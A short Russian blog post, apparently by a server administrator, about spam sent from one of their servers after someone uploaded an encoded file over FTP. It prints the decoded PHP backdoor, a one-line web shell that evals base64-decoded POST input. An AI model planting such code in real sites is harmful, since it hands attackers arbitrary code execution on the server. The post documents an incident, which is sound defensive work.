Очередной раз наспамили с одного из моих серверов.
Конструкция практически такая же, как
в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
(
Read more... )